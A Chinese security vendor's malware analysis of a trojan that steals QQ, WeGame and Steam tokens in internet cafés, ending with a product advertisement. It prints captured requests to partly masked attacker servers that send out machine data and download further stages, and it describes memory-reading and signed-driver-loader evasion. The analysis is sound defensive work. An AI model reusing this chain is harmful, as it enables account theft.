年末将至,网吧等公共场所迎来客流高峰,盗号、盗刷等网络安全事件也进入高发期。
玄武安全卫士近期捕获了一个典型的综合型盗号木马样本。该木马集多个平台盗号于一体,技术链条完整,对公共上网环境构成显著威胁。
现针对此做技术分析,旨在提醒网吧技术与广大用户上网期间注意做好虚拟资产防护。
样本分析
本次分析以静态文件+网络分析为主:
样本主程序从自身 0044C9AB 解密 然后写入到 TEMP 目录下随机文件名(后续称为 gnrdoa.exe),大小是54KB,然后使用CreateProcessA进行启动这个程序
0044C9AB
01 00 00 00 67 84 00 00 0D 0F 3E 03 00 D6 00 00 ....g.....>..Ö ..
0044C9BB
78 9C EC 7D 09 58 53 57 1A E8 0D 49 20 48 F0 C6 x.ì}.XSW.è .I HðÆ 0044C9CB 8A 96 8E 58 69 4D 2D 35 6A A9 51 8B 8D 68 50 02 ...XiM-5j©Q..hP.
0044C9DB
54 41 82 6C 2E E0 52 15 11 71 29 24 60 3B A2 62 TA.l.àR..q)$`; ¢b 0044C9EB 88 72 3D 4D 4B A7 3A E3 CC D8 4E 3B B6 1D BB 4C .r=MK§:ãÌØN;¶ .»L
接着分析该程序的网络请求:
通过一个一个检查请求的实际含义
GET https://vv.video.qq.com/checktime HTTP/1.1
Accept: */*
Connection: Keep-Alive
Host: vv.video.qq.com
Referer: https://vv.video.qq.com/checktime
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)
Response:
<?xml version="1.0" encoding="utf-8" standalone="no" ?>
<root><s>o</s><t>1764295601</t><ip>39.148.253.100</ip><pos>---</pos> <rand>hJpvmQBhLJhARXGTHI5m3A==</rand></root>
就是获取时间和外网ip地址的请求.这里借用了腾讯的api接口
请求->http://**.***.***.72:18289/,这里明显是自建服务器了.并且响应内容也做了加密处理.
GET http://**.***.***.72:18289/UserInfo?
data=eyJVc2VybmFtZSI6InloMDEiLCJjb21wdXRlcl9uYW1lIjoiREVTS1RPUC05U01DNzM4Iiwib3Nf dHlwZSI6IldpbmRvd3MgMTAgRW50ZXJwcmlzZV8xXzExMjEiLCJtYWMiOiIwMDowQzoyOTo1NDpCOToyQ SIsIm1lbW9yeV9zaXplIjoiOCIsImhhcmRfZGlza190b3RhbCI6IjYzLjk5IiwiY29kZSI6IkRFU0tUT1 AtOVNNQzczOHwwMDowQzoyOTo1NDpCOToyQSIsImNwdV9jb3JlcyI6IjgiLCJjcHVfdGhyZWFkcyI6Ijg iLCJpcDEiOiIzOS4xNDguMjUzLjEwMCJ9 HTTP/1.1
Accept: */*
Connection: Keep-Alive
Host: **.***.***.72:18289
Referer: http://**.***.***.72:18289/UserInfo?
data=eyJVc2VybmFtZSI6InloMDEiLCJjb21wdXRlcl9uYW1lIjoiREVTS1RPUC05U01DNzM4Iiwib3Nf dHlwZSI6IldpbmRvd3MgMTAgRW50ZXJwcmlzZV8xXzExMjEiLCJtYWMiOiIwMDowQzoyOTo1NDpCOToyQ SIsIm1lbW9yeV9zaXplIjoiOCIsImhhcmRfZGlza190b3RhbCI6IjYzLjk5IiwiY29kZSI6IkRFU0tUT1 AtOVNNQzczOHwwMDowQzoyOTo1NDpCOToyQSIsImNwdV9jb3JlcyI6IjgiLCJjcHVfdGhyZWFkcyI6Ijg iLCJpcDEiOiIzOS4xNDguMjUzLjEwMCJ9
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)
Response-Base64:
DQ8+A2sAAAB4nAFrAJT/KpVwOMesZHuDCPV8LJkQozZ9y0v4JHuSD64uIIULpGttn0mkLm+fA78nZ98Su CptlBf5JWGcS7YnY5gFtHcgmxSwZCLTF6IlbZQXpGQ0wEj1NWKUAadkNNNW53Ys3UazJ3qQRu1kP8NX9T u3Ki7z
解密:{"url":"https://******.tos-cn-
shanghai.volces.com/aamiac1.jpg","success":1,"sleep":"200","data":"123"}
这里明显又从oss里获取了一个资源.
GEThttps://******.tos-cn-shanghai.volces.com/aamiac1.jpg HTTP/1.1
Accept: */*
Connection: Keep-Alive
Host: ******.tos-cn-shanghai.volces.com
Referer: https://******.tos-cn-shanghai.volces.com/aamiac1.jpg
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)
Response:
Content-Length: 1132336
这里长度太长就不放了 ,这里实际上是一个pe文件 ,经过解密后写入%temp%/slhosta.exe
HASH- >ad686796f799db4f5b77699f9cc80a42
以下称为slhosta.exe
gnrdoa.exe
HASH->158cc4c1e62659c8cbc5398a8c2bb66b
接着看这个进程的网络请求
GET http://***.***.***.112:5684/info?m=00-0C-29-54-B9- 2A&u=F0C78DF7FA6A4C9395882FCCE9E669D1 HTTP/1.1
Accept: */*
Connection: close
Host: ***.***.***.112:5684
User-Agent: HTTP/1.1
Response:
HTTP/1.1 200 OK
Connection: close
Content-Length: 0
Content-Type: text/plain; charset=utf-8
Date: Fri, 28 Nov 2025 03:27:13 GMT
Server: Kestrel
这里是一个上报地址
GET http://***.***.***.112:6114/gadasfas/F0C78DF7FA6A4C9395882FCCE9E669D1 HTTP/1.1
Accept: */*
Connection: close
Host: ***.***.***.112:6114
User-Agent: HTTP/1.1
HTTP/1.1 200 OK
Connection: close
Content-Type: text/plain; charset=utf-8
Date: Fri, 28 Nov 2025 03:33:01 GMT
Server: Kestrel
KLw/N9ogHl43yEr9Bjk3Jzs39wGhZUTMJwl2dS8tPMjIsfbZ0ayaIhB19/2mouccJgwzM55ErLKX8BuQa NtUikM2ErlanXk3Nzc=
这里如果解密的话是一个链接.就是下面的这个.
GET http://***.***.***.112:8989/shell33.dll HTTP/1.1
Accept: */*
Connection: close
Host: ***.***.***.112:8989
User-Agent: HTTP/1.1
PE文件
GET http://***.***.***.112:8989/win.dll HTTP/1.1
Accept: */*
Connection: close
Host: ***.***.***.112:8989
User-Agent: HTTP/1.1
PE文件
这里出现了两个dll,分别是shell33.dll和win.dll,接下来会将他们进行剖析。
整体释放程序为以下程序:
接下来我们分析shell33.dll的网络请求
GET http://***.**.***.238:5212/ip.php HTTP/1.1 Response:
39.148.253.100
GET http://***.**.***.238:5212/np/install.php
Response:
{"result":false,"data":[],"msg":"the res is exist!","switch":"8"}
GET http://***.**.***.238:5212/ini/TTzx1012/xinwen2.txt HTTP/1.1 Response:
ok
GET http://***.**.***.238:5212/ini/TTzx1012/pz.txt HTTP/1. Response:
sHrXo3RCrncuVHg=
解密 :svchost.exe
GET http://***.**.***.238:5212/ini/TTzx1012/pz2.txt HTTP/1.1 Response:
q3jAuyEe9Wt5HjMPO/hXtL4fo/88h1X2I1Lw9Ss5hTqoOSmz
解密:http://***.***.***.116:9518/1012.bin
GET http://***.***.***.116:9518/1012.bin HTTP/1.1 Response:
PE文件
这里通过一系列的下发下载了一个1012.bin的pe文件
GET http://***.**.***.238:5212/ini/TTzx1012/xinwen.txt HTTP/1.1 Response:
GET http://***.***.***.116:9518/np12.dll HTTP/1.1 Response:
PE文件
1012.bin采集与传输分析
该模块会对多款平台的进程进行检测与内存读取,包括:
QQ.exe
WeGame.exe
Steam.exe
这是其盗号功能的主要来源程序。
开始分析1012.bin
静态分析拿到的包括一些ip以及http请求所使用到的一些关键字.以及QQ.exe这个字符串.
这里实测是对steam.exe/qq.exe/wegame感兴趣的
接下来实际抓包获取到的如下信息
1012.bin->QQ.exe
对安全敏感的朋友已经可以意识到问题的不对劲了,首先是通过利用qq的快速登录协议获取关键信息之后,向自建服务器发送了一条qq号的qq空间直链。
这里是把测试qq的token发送到自建服务器了
在测试完毕后,一段时间技术人员再打开测试qq时,发现qq已经被冻结了
同时qq多了非常多的好友,拉开聊天上下文发现是测试QQ主动向他们发送了一些内容。
1012.bin->wegame
看的出来如果1012.bin检测到wegame启动以后会主动从网络上拉下来一个Trxa.bin文件,并且之后就通过API将属于wegame的token进行发送了。
这里注意到实际上这个程序是向wegame发送了一个请求的,这个请求的接口是/login_by_qq, 也就是跟wegame的登录相关。这个盗号程序通过伪造内容欺骗了wegame的服务器从而获取到了wegame返回的游戏token。
1012.bin->Steam
这里1012.bin对steam的处理也十分简单,通过网络API获取到一个偏移地址(解密),然后加上模块基址进行读取数据,就把我的steam token获取到了。
现在所有获取到的PE
win.dll行为分析
看得出来,这个程序只是一个注入器.
将实际注入的内容提取出来
根据关键词 GamePlaza.exe和 BD-FILE-1.dat大致可以判断是与棋牌有关。
np12.dll行为分析
这个程序携带虚拟机壳,并且对wegame/qq/steam并不感兴趣,这里不做过多分析。
通过沙箱的行为根据经验推测是传奇类业务。
其中打码链接是通过阿里云dns获取域名解析地址,最后是注入 资源管理器进行持久化。
slhosta.exe行为分析
根据分析内容,这个exe对 C:\Program Files (x86)\Steam\steamclient.dll 感兴趣slhosta.exe为steam盗号程序。
经过测试,登录steam后,该程序马上发包。
经过分析,是通过ReadProcessMemory读取steam的内存.在栈上下文中包含字符串
eyAidHlwIjogIkpXVCIsICJhbGciOiAiRWREU0EiIH0
这个字符串是steam token的固定头。
Trxa.bin行为分析
刚刚1012.bin在进行盗号操作时,对QQ/Steam直接使用ReadMemoryProcess读取内存,但是对于wegame盗号,需要额外下载一个Trxa.bin的模块。
也就是说针对wegame盗号,并没有包含在1012.bin的逻辑之中,分析一下Trxa.bin到底是如何能把账号盗走。
仍旧是通过login_by_qq的官方接口进行获取。
请求接口
具体参数
这里由于分析过程中官方接口返回的内容是过期,实际上在正常情况下,这个盗号程序是在wegame之前启动,并且轮询wegame是否已经登录。如果登录了迅速就进行这一步操作,获取到的内容就不是失效而是有效的token了。
就比如这里就不是失败的了。
比较有趣的是,如果在玄武启动的情况下他会释放一个驱动,如果没有玄武的话,他会直接进行他的操作。
这里有些参数还是有一些信息的
这里还释放了一个 DriverModuleYuGuo.dat文件,本身释放出来的 *.sys驱动文件是有微软WHQL的签名的。
看来这个dat才是实际驱动,而这个携带WHQL的驱动只是一个driver loader。
这种签名一个驱动加载器,而实际驱动是文件的方式通常出现在小公司/工作室,因为向微软提交驱动签名太过于麻烦,通常是提交一个驱动加载器.然后后续使用加载器进行加载实际驱动程序.这样的话每次更新实际驱动程序也就是 *.dat文件时并不需要每次都提交给微软.
在网址的更新日志中可以找到这个驱动所实现的功能.看起来是一个功能强大的驱动程序.其中不仅仅用来读写内存/还有注入/保护进程/保护窗口/绘制等功能。
这个读写驱动还是挺贵的,一个月要999块了。
玄武安全提醒
本次分析的木马样本呈现出高度专业化、模块化的特征,其攻击链涵盖从初始渗透、资源解密、云端下载到多平台账号窃取的全过程,并具备驱动级攻击能力,传统安全软件难以有效防御。
玄武安全实验室提醒广大用户,尤其是网吧从业者与游戏玩家:
1.强化核心防护:务必部署具备主动防御与内核行为监控能力的安全产品。该木马通过合法签名驱动加载恶意模块,玄武安全卫士的“驱动行为分析”功能可有效识别并拦截此类绕过行为。
2.提示个人警惕:用户应为重要账号开启二次验证,即使Token被盗也能有效阻止登录。
3.保持软件更新:玄武安全卫士最新病毒库已包含本次分析涉及的所有恶意样本特征,并可基于行为模型检测未知变种。请确保安全组件为最新状态,以获得持续防护。
玄武安全卫士将持续监控此类威胁,为您的数字资产保驾护航。
产品介绍
寒露科技专注于系统安全防护。以防盗号与反外挂技术为基石,我们坚持探索前沿技术,驱动安全能力持续进化,为从个人到网吧的各类场景构建纵深防御,全方位守护终端与游戏安全。我们回归产品本质,以实现真实、可信的安全实效为唯一使命。
推荐各位网吧业主使用玄武安全卫士,这是一款专为网吧与电竞酒店等公共上网环境设计的安全防护软件,专注于防盗号和反外挂功能,因其轻量、高效的防御能力受到好评。
现在提供15天免费试用,欢迎联系网维技术人员进行安装试用。
